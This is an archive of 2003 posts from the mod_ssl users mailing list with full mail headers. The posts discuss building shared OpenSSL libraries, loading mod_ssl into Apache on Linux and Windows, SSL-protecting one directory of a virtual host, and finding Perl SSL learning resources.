Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Beau E. Cox" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Wait!

Please ignore (for now) my recent post (below). A friend just
suggested CPAN's IO::Socket::SSL - which, on first look,
my solve my problems.

Sorry to have wasted bandwidth and your time.

Aloha => Beau;

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Beau E. Cox
> Sent: Tuesday, February 25, 2003 11:34 PM
> To: modssl-users@modssl.org
> Subject: Using ssl/mod_ssl on non-apache HTTP server
> 
> 
> Hi -
> 
> I'm new to ssl/mod_ssl so please forgive me if this post
> is out in left field. I have a new contract to develop
> secure TCP/IP communication between many customer sites.
> I have prototyped a non-secure HTTP server/client system
> written in Perl. My client likes it - but he demands high-
> level security.
> 
> In my years of web programming, there has always been the
> 'security' guy around to take care of these 'details' for
> me, but now I am him... :)
> 
> I have been plowing through the Openssl, Perl modules
> (Net::SSLeay, etc.) documentation, but it's slow going
> and it hasn't 'clicked' yet for me.
> 
> Do any of you have suggestions of other resources that
> might help me? HOWTOs, FAQs, Articles, Books, anything?
> 
> Aloha => Beau.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 10:43:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D9EC82AA054; Wed, 26 Feb 2003 10:43:48 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 7A9362AA052
	for ; Wed, 26 Feb 2003 10:43:47 +0100 (CET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 2C6CB351D6; Wed, 26 Feb 2003 01:48:10 -0800 (PST)
Date: Wed, 26 Feb 2003 01:48:10 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Using ssl/mod_ssl on non-apache HTTP server
Message-ID: <20030226094810.GA11216@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Take a look at the code of Webmin, it uses a Perl based webserver that can
use SSL if available. http://www.webmin.com
I have a chapter online introducing the main SSL concepts, it is focused on apache
but it should be useful for the basics:
http://www.apacheworld.org/ty24/
then, for the programming side of things, this is a good book:
http://www.amazon.com/exec/obidos/tg/detail/-/059600270X
As a reference book, I found this one invaluable:
http://www.amazon.com/exec/obidos/tg/detail/-/0201615983

Cheers

Daniel

> Hi -
> 
> I'm new to ssl/mod_ssl so please forgive me if this post
> is out in left field. I have a new contract to develop
> secure TCP/IP communication between many customer sites.
> I have prototyped a non-secure HTTP server/client system
> written in Perl. My client likes it - but he demands high-
> level security.
> 
> In my years of web programming, there has always been the
> 'security' guy around to take care of these 'details' for
> me, but now I am him... :)
> 
> I have been plowing through the Openssl, Perl modules
> (Net::SSLeay, etc.) documentation, but it's slow going
> and it hasn't 'clicked' yet for me.
> 
> Do any of you have suggestions of other resources that
> might help me? HOWTOs, FAQs, Articles, Books, anything?
> 
> Aloha => Beau.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 14:22:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A84E62AA046; Wed, 26 Feb 2003 14:22:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta02-svc.ntlworld.com (mta02-svc.ntlworld.com [62.253.162.42])
	by master.modssl.org (Postfix) with ESMTP id 10CBE2AA01E
	for ; Wed, 26 Feb 2003 14:22:41 +0100 (CET)
Received: from larry-cdl4wdmfm.ntlworld.com ([62.253.144.72])
          by mta02-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20030226132234.UZRF4529.mta02-svc.ntlworld.com@larry-cdl4wdmfm.ntlworld.com>
          for ; Wed, 26 Feb 2003 13:22:34 +0000
Message-Id: <5.1.0.14.0.20030226132014.03252ec8@pop3.norton.antivirus>
X-Sender: laurence.cotton/pop.ntlworld.com@pop3.norton.antivirus
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 26 Feb 2003 13:22:50 +0000
To: modssl-users@modssl.org
From: Larry Cotton 
Subject: Re: Shared mod_ssl problems
In-Reply-To: <20030225224652.8718.qmail@iname.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Larry Cotton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi thanks for this.

I'm still having a few problems and was wondering if you new anyhting about 
the following:

1) Do I have to re-compile zlib ?

At 17:46 25/02/2003 -0500, you wrote:
>Hi,
>
>   I've faced exactly the same problem "undefined symbol: X509_free"
> > Ideally I would like to link ssl dynamically and I guess the solution 
> is to use shared openssl libraries (libcrypto.so and libssl.so). Does 
> anyone know :
> > a) How (or even if) I can build a shared OpenSSL (or where I can find out)
>
>   "config shared" worked fine for me (instead of simple "config") 
> -  don't forget "configure -s" for zlib if you compile zlib that will be 
> used by this OpenSSL
>
> > b) How I link these shared libraries into apache (can I use the 
> standard LoadModule directive for the OpenSSL libs, or do I need some 
> special SSL configuration ?) - or where I can find this out.
>
>   LoadModule works well - of course you have to have Apache with mod_so 
> module.
>
>   Jirka Vejrazka
>--
>__________________________________________________________
>Sign-up for your own FREE Personalized E-mail at Mail.com
>http://www.mail.com/?sr=signup
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 15:08:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 81B712AA046; Wed, 26 Feb 2003 15:08:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta07-svc.ntlworld.com (mta07-svc.ntlworld.com [62.253.162.47])
	by master.modssl.org (Postfix) with ESMTP id 26A162AA015
	for ; Wed, 26 Feb 2003 15:08:34 +0100 (CET)
Received: from larry-cdl4wdmfm.ntlworld.com ([62.253.148.41])
          by mta07-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20030226140833.ZIHC3191.mta07-svc.ntlworld.com@larry-cdl4wdmfm.ntlworld.com>
          for ; Wed, 26 Feb 2003 14:08:33 +0000
Message-Id: <5.1.0.14.0.20030226135952.03204008@pop3.norton.antivirus>
X-Sender: laurence.cotton/pop.ntlworld.com@pop3.norton.antivirus
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 26 Feb 2003 14:01:08 +0000
To: modssl-users@modssl.org
From: Larry Cotton 
Subject: Re: Shared mod_ssl problems
In-Reply-To: <20030225224652.8718.qmail@iname.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Larry Cotton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi

Thanks for these tips Jirka

When I build openssl, having configured it

At 17:46 25/02/2003 -0500, you wrote:
>Hi,
>
>   I've faced exactly the same problem "undefined symbol: X509_free"
> > Ideally I would like to link ssl dynamically and I guess the solution 
> is to use shared openssl libraries (libcrypto.so and libssl.so). Does 
> anyone know :
> > a) How (or even if) I can build a shared OpenSSL (or where I can find out)
>
>   "config shared" worked fine for me (instead of simple "config") 
> -  don't forget "configure -s" for zlib if you compile zlib that will be 
> used by this OpenSSL
>
> > b) How I link these shared libraries into apache (can I use the 
> standard LoadModule directive for the OpenSSL libs, or do I need some 
> special SSL configuration ?) - or where I can find this out.
>
>   LoadModule works well - of course you have to have Apache with mod_so 
> module.
>
>   Jirka Vejrazka
>--
>__________________________________________________________
>Sign-up for your own FREE Personalized E-mail at Mail.com
>http://www.mail.com/?sr=signup
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 15:09:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9F61E2AA056; Wed, 26 Feb 2003 15:09:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta07-svc.ntlworld.com (mta07-svc.ntlworld.com [62.253.162.47])
	by master.modssl.org (Postfix) with ESMTP id 147D42AA024
	for ; Wed, 26 Feb 2003 15:09:43 +0100 (CET)
Received: from larry-cdl4wdmfm.ntlworld.com ([62.253.148.41])
          by mta07-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20030226140942.ZJRU3191.mta07-svc.ntlworld.com@larry-cdl4wdmfm.ntlworld.com>
          for ; Wed, 26 Feb 2003 14:09:42 +0000
Message-Id: <5.1.0.14.0.20030226140121.031deed8@pop3.norton.antivirus>
X-Sender: laurence.cotton/pop.ntlworld.com@pop3.norton.antivirus
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 26 Feb 2003 14:09:52 +0000
To: modssl-users@modssl.org
From: Larry Cotton 
Subject: Re: Shared mod_ssl problems
In-Reply-To: <20030225224652.8718.qmail@iname.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Larry Cotton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi

Thanks for this Jirka.

When I build the openssl shared libs :
 > ./configure
 > make
 > make install

and try and run openssl
 > openssl

I get an error message saying it can't find the shared libraries :
openssl: error while loading shared libraries: libssl.so.0.9.7: cannot open 
shared object file: No such file or directory

If I run ldd on the openssl exe I get the following message :
 > ldd -v openssl
         libssl.so.0.9.7 => not found
         libcrypto.so.0.9.7 => not found
         libdl.so.2 => /lib/libdl.so.2 (0x4001f000)
         libc.so.6 => /lib/libc.so.6 (0x40022000)
         /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

         Version information:
         ./openssl:
                 libc.so.6 (GLIBC_2.1.3) => /lib/libc.so.6
                 libc.so.6 (GLIBC_2.1) => /lib/libc.so.6
                 libc.so.6 (GLIBC_2.0) => /lib/libc.so.6
         /lib/libdl.so.2:
                 libc.so.6 (GLIBC_2.1.3) => /lib/libc.so.6
                 libc.so.6 (GLIBC_2.1) => /lib/libc.so.6
                 libc.so.6 (GLIBC_2.2) => /lib/libc.so.6
                 libc.so.6 (GLIBC_2.0) => /lib/libc.so.6
         /lib/libc.so.6:
                 ld-linux.so.2 (GLIBC_2.1.1) => /lib/ld-linux.so.2
                 ld-linux.so.2 (GLIBC_2.2) => /lib/ld-linux.so.2
                 ld-linux.so.2 (GLIBC_2.1) => /lib/ld-linux.so.2
                 ld-linux.so.2 (GLIBC_2.0) => /lib/ld-linux.so.2

[ also attemting to configure apache also comes up with an error saying 
that  it can't find the shared libraries].

Does anyone know what might be going on here ?

Cheers
Larry

At 17:46 25/02/2003 -0500, you wrote:
>Hi,
>
>   I've faced exactly the same problem "undefined symbol: X509_free"
> > Ideally I would like to link ssl dynamically and I guess the solution 
> is to use shared openssl libraries (libcrypto.so and libssl.so). Does 
> anyone know :
> > a) How (or even if) I can build a shared OpenSSL (or where I can find out)
>
>   "config shared" worked fine for me (instead of simple "config") 
> -  don't forget "configure -s" for zlib if you compile zlib that will be 
> used by this OpenSSL
>
> > b) How I link these shared libraries into apache (can I use the 
> standard LoadModule directive for the OpenSSL libs, or do I need some 
> special SSL configuration ?) - or where I can find this out.
>
>   LoadModule works well - of course you have to have Apache with mod_so 
> module.
>
>   Jirka Vejrazka
>--
>__________________________________________________________
>Sign-up for your own FREE Personalized E-mail at Mail.com
>http://www.mail.com/?sr=signup
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 15:19:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 719F22AA046; Wed, 26 Feb 2003 15:19:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from spf1.us.outblaze.com (205-158-62-139.outblaze.com [205.158.62.139])
	by master.modssl.org (Postfix) with SMTP id 8D4FF2AA024
	for ; Wed, 26 Feb 2003 15:19:28 +0100 (CET)
Received: (qmail 4560 invoked from network); 26 Feb 2003 14:19:25 -0000
Received: from unknown (205.158.62.68)
  by spf1.us.outblaze.com with QMQP; 26 Feb 2003 14:19:25 -0000
Received: (qmail 86634 invoked from network); 26 Feb 2003 14:17:23 -0000
Received: from unknown (HELO ws1-6.us4.outblaze.com) (205.158.62.53)
  by 205-158-62-153.outblaze.com with SMTP; 26 Feb 2003 14:17:23 -0000
Received: (qmail 67374 invoked by uid 1001); 26 Feb 2003 14:17:22 -0000
Message-ID: <20030226141722.67373.qmail@iname.com>
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Received: from [194.228.23.10] by ws1-6.us4.outblaze.com with http for
    bos@writeme.com; Wed, 26 Feb 2003 09:17:22 -0500
From: "Jirka Vejrazka" 
To: modssl-users@modssl.org
Date: Wed, 26 Feb 2003 09:17:22 -0500
Subject: Re: Shared mod_ssl problems
X-Originating-Ip: 194.228.23.10
X-Originating-Server: ws1-6.us4.outblaze.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jirka Vejrazka" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Do I have to re-compile zlib ?

  It depends - check your lib directory (/usr/local/lib at my system). If you can find libz.so.1.1.4, then you're fine. If you have older version, you probably want to upgrade, since older version has a security bug and there is no point in having up-to-date OpenSSL based on vulnerable zlib.

 Jirka Vejrazka
-- 
__________________________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 15:37:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 29C012AA047; Wed, 26 Feb 2003 15:37:13 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 85F322AA024
	for ; Wed, 26 Feb 2003 15:37:11 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h1QEhd109425
	for ; Wed, 26 Feb 2003 14:43:59 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Wed, 26 Feb 2003 14:36:28 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F2731@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Linux Red Hat 7.2 + openSSL 0.9.7 + Apache 1.3.27 + mod_ssl 2
	.8.1	2 = PROBLEMS!!!
Date: Wed, 26 Feb 2003 14:36:28 -0000
Sensitivity: Company-Confidential
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> Sent: 25 February 2003 15:15
> To: modssl-users@modssl.org
> Subject: RE: Linux Red Hat 7.2 + openSSL 0.9.7 + Apache 
> 1.3.27 + mod_ssl
> 2.8.1 2 = PROBLEMS!!!
> Sensitivity: Confidential
> 
> 
> Why is apachectl in /usr/sbin/apachectl? This sounds like the default
> installation that came with RH. Your apachectl and httpd should be in
> /home/aspco1/apache_1.3.27/bin. What happens if you do
> /home/aspco1/apache_1.3.27/bin/apachectl startssl? I think 
> this is your
> MAIN problem... 
> 

You should be able to install this on Red Hat with no problems (I haven't
tried it yet though. Compiling openssl 0.9.7 on Red Hat 7.2 and above is on
my todo list). Remove the Red Hat apache, modssl and mm packages first with:
rpm -e mm apache modssl

You might find you have other packages installed, eg php. You'll need to
remove these too. DON'T REMOVE THE REDHAT OPENSSL PACKAGE. You'll have even
more problems if you do...

Like Owen, I don't think you can build mod_ssl without mm either.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

A world of difference - in the UK, 37 million people put their faith on the
last census as "Christian". In Saudi Arabia, this answer would carry a death
sentence for any Saudi.



- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 06:10:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id F3AAC2AA054; Thu, 27 Feb 2003 06:09:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (f149.pav2.hotmail.com [64.4.37.149])
	by master.modssl.org (Postfix) with ESMTP id 30A972AA024
	for ; Thu, 27 Feb 2003 06:09:58 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 26 Feb 2003 21:09:56 -0800
Received: from 66.149.178.124 by pv2fd.pav2.hotmail.msn.com with HTTP;
	Thu, 27 Feb 2003 05:09:56 GMT
X-Originating-IP: [66.149.178.124]
From: "Andrew Metcalfe" 
To: modssl-users@modssl.org
Subject: win32 + mod ssl + apache = ???
Date: Wed, 26 Feb 2003 23:09:56 -0600
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 27 Feb 2003 05:09:56.0988 (UTC) FILETIME=[78622BC0:01C2DE1E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Metcalfe" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello, I'm having trouble with getting SSL on win32 to work.

I am currently using apache_1.3.26 under XP pro.

I believe I have properly configured httpd.conf as directed, but I'm
getting the following error:

"Syntax error on line 195 of c:/program
files/apache/group/apache/conf/httpd.conf:
  Cannot load c:/program files/apache group/apache/modules/mod_ssl.so
into server: (127) The specified procedure could not be found:"

In the HOW_TO, they suggested this is caused by a missing "AddModule"
line.

"AddModule mod_ssl.c " is the last line in the AddModule section.

"LoadModule ssl_module modules/mod_ssl.so" is the last line in the
loadModule section.

ssleay32.dll and libeay32.dll are in \windows\system32, I also copied
them to %Apache_ROOT%\bin\ for good luck.

I have no entries in /logs.  LogLevel is set to Debug.

Can anyone help?

_Am






_________________________________________________________________
The new MSN 8: smart spam protection and 2 months FREE*  
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 06:50:17 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0D8292AA054; Thu, 27 Feb 2003 06:50:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from world.tonkinresolutions.com (233-123.adsl6.netlojix.net [207.71.233.123])
	by master.modssl.org (Postfix) with ESMTP id E0EE82AA015
	for ; Thu, 27 Feb 2003 06:50:14 +0100 (CET)
Received: from world.tonkinresolutions.com (localhost.tonkinresolutions.com [127.0.0.1])
	by world.tonkinresolutions.com (8.12.7/8.12.6) with ESMTP id h1R5nZVk055049
	for ; Wed, 26 Feb 2003 21:49:35 -0800 (PST)
	(envelope-from nick@tonkinresolutions.com)
Received: from localhost (nick@localhost)
	by world.tonkinresolutions.com (8.12.7/8.12.6/Submit) with ESMTP id h1R5nYsG055046
	for ; Wed, 26 Feb 2003 21:49:34 -0800 (PST)
X-Authentication-Warning: world.tonkinresolutions.com: nick owned process doing -bs
Date: Wed, 26 Feb 2003 21:49:34 -0800 (PST)
From: Nick Tonkin 
To: modssl-users@modssl.org
Subject: securing one area of a vhost in apache 2
Message-ID: <20030226214223.N54997@world.tonkinresolutions.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nick Tonkin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello,

I am using Apache/2.0.44 (Unix) mod_perl/1.99_09-dev Perl/v5.8.0
mod_ssl/2.0.44 OpenSSL/0.9.7

I have a virtual host which mostly is served without SSL. But it has one
area, /secure,  that needs to be secured with SSL. I've tried various
combinations of directives but can't get it to work. Right now I have:


    SSLEngine on
    SSLProtocol all
    SSLCipherSuite HIGH:MEDIUM
    SSLCertificateFile /home/debug/www/_conf/certs/ladyraquel.crt
    SSLCertificateKeyFile /home/debug/www/_conf/certs/ladyraquel.key
    SSLCACertificateFile /home/debug/www/_conf/certs/ca.crt
    SSLVerifyClient none

    
        SSLVerifyClient require
        SSLVerifyDepth 1
    


The server starts fine, serves non-SSL pages fine, but hangs when I
request /secure .

The error log has nothing, but the access log shows that the request went
instead to the server's first virtual host, with a weird method of 'L'.

Any advice much appreciated.

- nick

-- 

~~~~~~~~~~~~~~~~~~~~
Nick Tonkin   {|8^)>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 07:10:55 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5906D2AA054; Thu, 27 Feb 2003 07:10:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from oldnexus.iptopia.net (nexus.iptopia.net [130.94.249.11])
	by master.modssl.org (Postfix) with ESMTP id 49CA72AA023
	for ; Thu, 27 Feb 2003 07:10:53 +0100 (CET)
Received: from niclap (evrtwa1-ar9-4-65-249-186.evrtwa1.dsl-verizon.net [4.65.249.186])
	by oldnexus.iptopia.net (8.10.1/8.10.0) with SMTP id h1R6Amr27977
	for ; Wed, 26 Feb 2003 22:10:48 -0800
From: "Steven Resnick" 
To: 
Subject: RE: securing one area of a vhost in apache 2
Date: Wed, 26 Feb 2003 22:14:09 -0800
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
In-Reply-To: <20030226214223.N54997@world.tonkinresolutions.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Steven Resnick" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The technique I have seen for this is to simply serve the entire site using
SSL and link only to the areas you want as secure.



> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Nick Tonkin
> Sent: Wednesday, February 26, 2003 9:50 PM
> To: modssl-users@modssl.org
> Subject: securing one area of a vhost in apache 2
>
>
>
> Hello,
>
> I am using Apache/2.0.44 (Unix) mod_perl/1.99_09-dev Perl/v5.8.0
> mod_ssl/2.0.44 OpenSSL/0.9.7
>
> I have a virtual host which mostly is served without SSL. But it has one
> area, /secure,  that needs to be secured with SSL. I've tried various
> combinations of directives but can't get it to work. Right now I have:
>
> 
>     SSLEngine on
>     SSLProtocol all
>     SSLCipherSuite HIGH:MEDIUM
>     SSLCertificateFile /home/debug/www/_conf/certs/ladyraquel.crt
>     SSLCertificateKeyFile /home/debug/www/_conf/certs/ladyraquel.key
>     SSLCACertificateFile /home/debug/www/_conf/certs/ca.crt
>     SSLVerifyClient none
>
>     
>         SSLVerifyClient require
>         SSLVerifyDepth 1
>     
> 
>
> The server starts fine, serves non-SSL pages fine, but hangs when I
> request /secure .
>
> The error log has nothing, but the access log shows that the request went
> instead to the server's first virtual host, with a weird method of 'L'.
>
> Any advice much appreciated.
>
> - nick
>
> --
>
> ~~~~~~~~~~~~~~~~~~~~
> Nick Tonkin   {|8^)>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 27 10:25:44 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8F0862AA054; Thu, 27 Feb 2003 10:25:44 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from beaucox.com (cap175-219-202.pixi.net [207.175.219.202])
	by master.modssl.org (Postfix) with ESMTP id 9FBA42AA015
	for ; Thu, 27 Feb 2003 10:25:41 +0100 (CET)
Received: from rocky (207.175.219.203)
	by beaucox.com with [XMail 1.11 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Wed, 26 Feb 2003 23:25:38 -1000
From: "Beau E. Cox" 
To: "Mod_Ssl" 
Subject: Perl CPAN IO::Socket::SSL on WIndows
Date: Wed, 26 Feb 2003 23:25:37 -1000
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
